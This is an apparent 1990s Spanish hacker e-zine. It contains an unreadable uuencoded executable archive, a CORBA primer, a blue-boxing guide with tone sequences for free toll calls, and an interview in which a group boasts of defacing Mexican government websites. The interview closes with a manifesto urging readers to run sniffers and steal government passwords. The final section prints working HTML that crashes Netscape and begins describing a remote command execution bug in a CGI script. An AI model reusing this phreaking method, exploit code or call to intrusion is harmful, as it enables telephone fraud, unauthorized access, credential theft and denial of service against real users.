MM6K@T?40N\C`AB4R:-40">QX/3PO4&Q1$(`[4JG3TU`,MP&RW`1Z_D>=E'I0
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
D``!"051#2$5812Y%6$502P4&``````(``@"B````VB<`````
`
end

[ FIN DEL PROGRAMA ]


                              <=Yo-Soy=>
                           varf@bigfoot.com
                        <>

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ CORBA - 12r ]

    ---------------------------------------------------------------------
    ----------------------------CORBA------------------------------------
    ---------------------by 12r43l Overdrive-----------------------------
    ---------------------12r@antisocial.com------------------------------
    ---------------------------------------------------------------------

Ya  que  CORBA  es una  buena  alternativa  para el desarrollo de aplicaciones
distribuidas  y absoluta  contraparte  de el  modelo de M$  COM/DCOM , en este
articulo se explica basicamente que es CORBA.
 
Olvidandonos  momentaneamente de la historia y en terminos cortos, CORBA es un
estandar  de computacion  distribuida  en el  cual  un objeto  es  una   unica
instancia identificable de algun tipo de construccion que provee servicios que
pueden ser requeridos por un cliente.

Un tipo se refiere a enteros, caracteres, etc..., una constuccion de tipos son
estructuras, uniones, etc...

Una interfaz  es un conjunto de servicios que puden ser requeridos o atendidos
por uno o mas objetos, ademas una interfaz puede tener atributos.

Los  servidores llamados  implementaciones de  objetos proveen la execucion de
los servicios requeridos.

Arquitectura.

basicamente  la arquitectura  de CORBA  se puede  expresar en terminos de tres
componentes primarios que son:
El cliente, el Object Request Broker (ORB), y la implementacion del objeto.

El cliente  solicita servicios  del  ORB, el  ORB localiza  la  implementacion
de  los objetos  que  se requieren para satisfacer una peticion en particular,
invoca  un  metodo  de la implementacion y regresa el resultado recibido de la
implementacion al cliente. 
La  implementacion expone  metodos para  ser invocados  por  el  ORB,  ejecuta
cualquier  operacion requerida  para satisfacer el requerimiento  y regresa el
resultado al ORB.

El  cliente solo  conoce como accesar al ORB y pedirle un servicio, no sabe ni
conoce  como trabaja  la implementacion.  Cuando un  ORB  recibe un pedido, el
corazon  del ORB  es  responsable  de  encontrar la  implementacion de objeto,
invocando  algun metodo,  pasando  parametros, y  transfiriendo  control a  la
implementacion.

Un adaptador de objeto provee la interfaz entre el ORB y la implementacion del
objeto, el ORB soporta uno o mas adaptadores de objetos.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ Blue Boxing en Argentina - Dr_Format^ ]
             _
           _ //_____
           \//     |
    ____    /      |_____ _______ ______ _        ________ ____
    /  |___|      |/    |/     /___    \|_____    \     /    /
   /   |\   \      |     |     /   \     \     \   /    //HCK \
  /__________\     |_____\_____|____\_____\_____| /_____/\_____\ _
 - --------|      _|__ - ---------------------------------------\\ - -
           /_____|_| \|
                 |   _|_         
                 |_      PhreAK nota por Dr_Format^ especialmente para Raregazz
                    |___                    HACK THE PLANET

                                   BoXIng ArGeNtinA!



                        El BLUE BOX UNA FORMA DE PHREAKING

Que pasa cuando nosotros llamamos a un telefono?

Cuando nosotros  realizamos un  llamado al  mismo switch (ej: 21-2323 21 es el
switch) el  llamado no  sale  de la  central;  si el  numero  que discamos  no
pertenece  a nuestro  switch,  nuestra central  le  envia una serie de tomos o
comandos al otro  switch. Cuando cortamos nuestro switch le indica al otro que
debe volver a modo normal.

Que pasaria si falsificaramos el corte?
Podriamos  hacer llamados  INTERNACIONALES y NACIONALES  completamente gratis,
ahora les paso a explicar como es el asunto!


                        - - =  Blue Boxing desde ZERO = - -
                                     Para centrales CCITT #5

Los comandos mas importantes son:

KP          = Key Pulse           (NACIONAL)
KP2         = Key Pulse 2         (INTERNACIONAL)
ST          = Start Tone          (comienza un secuencia)
2600/2400hz = frecuencia de corte (la mas importante)


Como realizamos llamados completamente gratis?

                                 country
Llamada internacional        00  code  area  switch date
                             |    |    |     |      |
KP 080030303 WAIT 2600 STP2 (XX)-(XX)-(XX)-(XXX)-(XXX) ST
       |                          
    cualquier 
    0800

                                  switch
Llamada nacional             area code |    date
                              |   |    |
KP 080030303 WAIT 2600 STP (XX)-XXX-XXX
       |
     cualquier 
     0800

Aca tienen  una lista  de los tonos de las centrales digitales, espero que les
sirva:

     Ŀ
        Tono               Frecuencia  Tiempo de   Tiempo de   
                             (Hz)      Activado   Desactivado  
                                        (Seg.)      (Seg.)     
     Ĵ
     Discado                350+440    Continuo                
     Ocupado                480+620    0,5         0,5         
     Campanilla normal      440+480    2           4           
     Campanilla PBX         440+480    1           3           
     Congestion (tel.pub.)  480+620    0,2         0,3         
     Rellamada (Local)      480+620    0,3         0,2         
     Receptor Descolgado    1400+2060+ 0,1         0,1         
                            2450+2600                           
     Numero no existe       200 a 400  Continuo, modulado en    
                                       frecuencia con 1 Hz.     
     

Bueno amigos  espero que esta nota les haya gustado!.. y bueno les deseo mucha
suerte!

                               Saludos de Dr_Format^
                               fbossi@usa.net


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ Entrevista a X-Ploit Team ]

En exclusiva para  todos los lectores  RareGaZz les ofrecemos  esta entrevista
que hemos realizado al tan famoso grupo mexicano X-Ploit:


-------------------------------------------------------------------
- Como surgio x-ploit TEAM?

En alguna  vez nos  encontramos en el IRC en un canal de hacking, comenzamos a
intercambiar   informacion   y  comenzamos  a   frecuentarnos,  posteriormente
comenzamos  algunos  proyectos  juntos  y  surgio  la idea de formar un grupo,
afectados por la misma problematica; siendo todos mexicanos, y cansados de los
abusos del gobierno decidimos intervenir los sistemas del gobierno mexicano.

-------------------------------------------------------------------
- Cuantos miembros lo componen?

Somos 3, LoTek,  LeadRain y DES, todos mexicanos. Nos conocemos personalmente,
aunque nuestro primer  contacto fue electronico. Pero la red nos permite estar
a mucha distancia y seguir actuando como una fuerza efectiva.

-------------------------------------------------------------------              
- Desde cuando estan activos?

Desde hace aproximadamente 1 ao.

-------------------------------------------------------------------              
- Que les llevo a unirse? algun objetivo en concreto?

Nuestras  ideas eran  similares,  y nuestro intercambio de informacion fue muy
dinamico, y productivo, todos los miembros del equipo aportabamos activamente,
por lo que nos acoplamos perfectamente para nuestros proyectos.
              
-------------------------------------------------------------------
- Poseen alguna pagina web? donde?

No, no existe pagina oficial de X-ploit, aunque nos gustaria encontrar espacio
en algun sitio para subir la informacion del grupo.

-------------------------------------------------------------------              
- En que proyectos estan trabajando actualmente?

Seguridad en todos sabores de UN*X, phreaking, NO virus, NO anarquia.
              
-------------------------------------------------------------------
- Quien es el lider de X-Ploit TEAM?

No  hay un  lider, todos  aportamos para  el  equipo cuanto podemos, con ideas
tanto de unos como de otros.

-------------------------------------------------------------------              
- He  oido mucho  hablar de x-ploit pero nunca de ninguno de sus miembros. Les
  gusta permanecer en el anonimato? no tienen nicks?

Claro  que si  tenemos,  somos Lotek,  LeadRain  y DES,  sino has escuchado de
nuestros nicks  es  precisamente porque  somos  un equipo,  y  nos  hemos dado
a conocer como el X-Ploit Team.

-------------------------------------------------------------------              
- Estan  llevando a  cabo alguna labor educativa, como crear listas de correo,
  revistas, etc?

No, por  el momento puede ser riesgoso para nosotros tener mucha participacion
en  ese  aspecto,  aunque  si  deseariamos  dar  a  conocer  a  otros  hackers
herramientas para crear un frente comun.

-------------------------------------------------------------------              
- Creen que su proximidad con Estados Unidos les ha influido? Como?

Si y  no, no  se pueden  negar los origenes del hacking en Estados Unidos, asi
como  en otros  paises (Alemania,  etc), sin embargo  hemos formado  un perfil
muy nacional,  con otras  ideas, problematica que nos afecta a nosotros, y que
es ajena a la de los hackers de otros paises, NO hemos querido hacer NON-SENSE
HACKING,  sino hackear  con una finalidad, una idea central, no solo por poner
"AQUI  ESTUVE". Por  lo mismo nuestros hacks han sido enfocados al BIG BROTHER,
e instituciones corruptas.

-------------------------------------------------------------------              
- Son especialmente  conocidos por  sus ataques  al gobierno mexicano. Como se
  les ocurrio y cuando empezaron estos ataques?

Comenzaron  el  4  de  Febrero,  con  el  hack a la pagina de la secretaria de
Hacienda, y posteriormente:

23.Abril.98 Comision Nacional del Agua (www.cna.gob.mx)
29.Abril.98 Instituto Nacional de Estadistica Geografia e Informatica
   (www.inegi.gob.mx)
25.Mayo.98 Senado de la Republica (www.senado.gob.mx)
14.Julio.98 Secretaria de Salud (www.ssa.gob.mx)
16.Septiembre.98 San Pedro.gob.mx (www.sanpedro.gob.mx)

-------------------------------------------------------------------              
- Como lograron introducirse en su red?

Diferentes vulnerabilidades,  propias de  cada sistema,  desde DYNIX, Solaris,
SCO, etc...

-------------------------------------------------------------------              
- Hackean tambien otro tipo de webs? cuales?

Si,  pero  no  alteramos  informacion  en  ellos, incluso en la mayoria de las
ocasiones hemos reportado los huecos de seguridad al administrador del sistema,
en otros aplicamos el parche correspondiente y no decimos nada.

-------------------------------------------------------------------              
- Creen  que  con  el  hacking  se  puede  daar a  un gobierno? Creen haberlo
  conseguido?

Quizas  no, pero  lo  que si  hemos  conseguido es despertar a otros hackers a
actuar en contra del gobierno corrupto, si cada vez somos mas en algun momento
seremos mas fuertes y entonces tendran miedo de que rebelemos la verdad a todo
el mundo.

-------------------------------------------------------------------              
- A  esto, algunos  lo  llaman *hactivismo* (hackear  por motivos  politicos y
  sociales). Piensan que forma parte de la evolucion natural del hacker?

Si,  es hacer  hacking  con una  finalidad, como te repito, ya no es solamente
poner "AQUI  ESTUVE", sino  aprovechar el  impacto que puede tener el hecho de
entrar  a  un  sistema que  deberia  ser muy  seguro, es una noticia que da la
vuelta al mundo,  y que mejor que hacerlo para manifestar la inconformidad del
PUEBLO.
              
-------------------------------------------------------------------
- Tienen contactos frecuentes  con la guerrilla zapatista? La ayudan de alguna
  forma? Se puede decir que guerrilleros y hackers van por el mismo camino, en
  Mexico?

No  podriamos llamarnos  guerrilleros, ni llamar a los hackers en general asi,
pues cada hacker  o grupo tiene su ideologia, algunos solo hacen por demostrar
que pueden  hacerlo o que un sistema es vulnerable, pero lo que es un hecho es
que  ambos, hackers  y  guerrilleros estamos  contra  el gobierno,  y  asi  lo
estaremos mientras nos quieran  engaar y controlar, lo que si podria decir es
que ambos somo REBELDES.
              
-------------------------------------------------------------------
- El  mundo exterior  no cree que con el hacking se pueda cambiar la sociedad,
  pero ustedes, con sus acciones, han conseguido como minimo que sus denuncias
  saltasen las fronteras mexicanas. Era este el objetivo? Piensan que se puede
  llegar mas alla de la simple contrapropaganda? Aprobarian llegar mas alla?

Claro, como ya lo hemos manifestado nuestra protesta fue de un enorme impacto,
llego a  escucharse en los  rincones del mundo, gracias a INTERNET, no es algo
extrao lo que estamos haciendo, INTERNET es un medio masivo  de comunicacion,
y como tal  lo estamos aprovechando,  para dar a  conocer problemas de nuestro
pais, que  el gobierno  ha querido  encubrir, para  guardar una imagen ante el
mundo, nosotros  les demostramos  que aunque "solo" eramos unos hackers contra
todo su  sistema represivo pudimos manifestarnos  y decir la verdad, todo esto
gracias a LA RED.

-------------------------------------------------------------------
- Como ven el  futuro del mundo undergroung en Mexico y el undreground hispano
  en general?

Esta madurando, en algunos paises ha crecido como una replica de lo que sucede
en Estados Unidos, a  diferencia y muy  concretamente en Mexico nosotros hemos
querido empezar una escena de hackers CONSCIENTES, con ideologia muy concreta,
no queremos que se confunda PIRATA con HACKER, el "hacktivism" como se ha dado
en llamar  a nuestras  acciones, asi  como  las de otros grupos en el mundo ha
sido un  paso importante en la evolucion del hacking, creemos que en el futuro
los hackers vamos a  poder rechazar y realmente seleccionar la informacion que
sea verdadera, rechazar las mentiras y del mismo modo dar a conocer la verdad,
la censura cada  vez sera menor, en el verdadero  sentido de la  palabra somos
PODEROSOS  los hackers,  y  somos una  comunidad, es dificil que los gobiernos
puedan reprimirnos a todos. Es muy bueno que surgan revistas en nuestro idioma,
como  RareGaZz, que  demuestran que  hay una  escena de  hackers latinos  alla
afuera...
              
-------------------------------------------------------------------
- Tienen algun sitio de reunion (IRC, BBS, etc ...)?

No,  seria muy  peligroso para el equipo presentarnos en sitios "publicos". De
hecho nos  han comentado por e-mail que nos han visto en el IRC, evidentemente
no somos nosotros,  no entrariamos al  IRC a decir quienes somos y a alardear,
corriendo el riesgo de ser rastreados.
              
-------------------------------------------------------------------
- Hay  que  estar muy  seguro antes de hackear una web del gobierno y, ademas,
  reconocer publicamente que lo han hecho. No tienen miedo de que les atrapen?

Claro, creo  que todos  sin excepcion tenemos miedo de perder nuestra libertad
o algo  mas, en cualquier  ambito, sin embargo tuvimos que demostrarle al gran
hermano  que  podiamos  gritarle   lo  que  opinabamos   sin  pensar  en   las
consecuencias, si pensaramos en las consecuencias su sistema represivo estaria
funcionando.

-------------------------------------------------------------------              
- Se comenta que el FBI va detras de ustedes. Que hay de cierto en todo esto?

Si  hemos oido  algunos  rumores, y  otros  hackers nos  lo  han comentado, no
estamos  seguros de  que  tan cierto sea, gente que conocemos en otras esferas
nos  han manifestado que tambien  la secretaria de gobernacion inicio algo  al
respecto, de  nuevo lo ignoramos, pero  eso no nos detendra  a seguir haciendo
escuchar nuestra voz.

-------------------------------------------------------------------              
- Van a seguir hackeando webs del gobierno mexicano? hasta cuando?

Vamos  a seguir  luchando  contra el  gobierno, sea hackeando webs o con otras
acciones, lo  que principalmente buscamos  con estos hacks fue despertar a los
hackers mexicanos que andan por ahi, para unir esfuerzos en una causa comun, y
que el gobierno se diera cuenta que ahi estabamos y ahi estaremos, hay hackers
tanto dentro  como fuera del  mismo gobierno, por lo  que cada vez seremos mas
fuertes.  No nos  quedaremos pasivos antes  las malas decisiones del gobierno,
que  solo enriquecen  a unos  cuantos, basta  de mentiras,  basta de FOBAPROA,
basta  de CABAL  PENICHE,  basta de  LOS  SALINAS, basta  de ZEDILLO, basta de
ABUSOS!!!

El  dia de  la independencia vimos que los mexicanos aun respetan sus simbolos
patrios, pero vimos  con tristeza y coraje que el gobierno se aprovecha de esa
"sumision" que tenemos como pueblo, creemos que ya fue suficiente de vernos la
cara,  narcotrafico en  el  ejercito, esa  institucion  yo creo  que  ya no la
respeta  nadie, asi como muchas mas, y  sin embargo en la television nos hacen
creer que todo va bien, en cuanto terminara el dolar?, alguien ya lo sabe.

-------------------------------------------------------------------              
AQUI TE HACEMOS LLEGAR NUESTRO MANIFIESTO:

"Festejamos  la respuesta  que  ha  habido  por parte de la gente  que nos  ha
comunicado  su solidaridad  y su  disposicion para una alianza mexicana por la
libertad  de expresion,  y contra la negligencia del gobierno. Y reiteramos la
convocatoria  para interferir  los  sistemas gubernamentales y los monopolios,
que nos  permitan conocer la VERDAD, no  solo lo que les conviene decir, y los
invitamos  a que al  estar inconformes con  el  sistema,  aquellos  que tengan
acceso  a informacion confidencial  la den a conocer,  la divulguen, de manera
anonima si es  necesario, pero llegara  el dia en  que podamos  gritar nuestro
desacuerdo sin temor a represalias, porque cada vez seremos mas.

Si tienes acceso  a una red del gobierno, corre un sniffer, consigue passwords
y  busca lo  que el gobierno  nos esconde; cuenta con nuestro  apoyo,  nuestro
e-mail esta a tu disposicion, y daremos a conocer la informacion que nos hagas
llegar,  recurre a  los medios, nacionales e internacionales, no podran callar
todas nuestras voces.

LA INFORMACION ES PODER, Y EL SABER NOS HACE LIBRES!!!


[X-PLOIT TEAM] - 100% Mxico

x_ploit@hotmail.com

 Mexico para los mexicanos e Internet para X-Ploit !!"
-------------------------------------------------------------------


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ Bugs y Exploits - PaTa ]

-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-
S.O/Programa: Netscape 3.x y 4.x                                             
Objetivo:     DoS usando nested tables demtro de etiquetas span
Parche:       -
Creditos:     Leonid Ksido
Descripcion:  Testeado en Communicator 4.05 en Linux Slackware 3.4, y
              Navigator 4.05 en Windows 98
Codigo:
                    <HTML>
                    <SPAN  STYLE="position:absolute; LEFT:0">
                    <TABLE BORDER="0" WIDTH=100%>
                    <TR>
                    <TD>
                    <TABLE>
                    <TR>
                    <TD>
                    </TD>
                    </TR>
                    <TR>
                    <TD>
                    <TABLE>
                    <TR>
                    <TD>
                    </TD>
                    </TR>
                    </TABLE>
                    </TD>
                    </TR>
                    </TABLE>
                    </TD>
                    </TR>
                    </TABLE>
                    </SPAN>
                    </HTML>
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: CGI-Script
Objetivo:     Ejecutar comandos de forma remota
Parche:       Quitar `faxsurvey.orig'
Creditos:     Tom <dod@MUENSTER.NET>
Descripcion:  Existe un bug en el "faxsurvey" CGI-Script, que permite 
              ejecutar comandos en el servidor HTTP
